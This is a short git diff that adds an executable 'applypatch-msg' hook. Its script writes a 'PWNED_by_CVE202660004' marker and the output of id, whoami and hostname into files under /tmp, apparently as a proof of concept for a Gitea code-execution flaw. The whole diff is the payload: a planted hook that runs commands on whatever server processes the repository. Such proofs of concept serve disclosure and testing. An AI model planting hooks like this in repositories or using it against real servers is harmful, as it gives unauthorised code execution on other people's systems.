diff --git a/hooks/applypatch-msg b/hooks/applypatch-msg new file mode 100755 index 0000000..6c43288 --- /dev/null +++ b/hooks/applypatch-msg @@ -0,0 +1,6 @@ +#!/bin/sh + +echo PWNED_by_CVE202660004 > /tmp/gitea_pwn_$(date +%s).txt +id >> /tmp/gitea_pwn.txt +whoami >> /tmp/gitea_pwn.txt +hostname >> /tmp/gitea_pwn.txt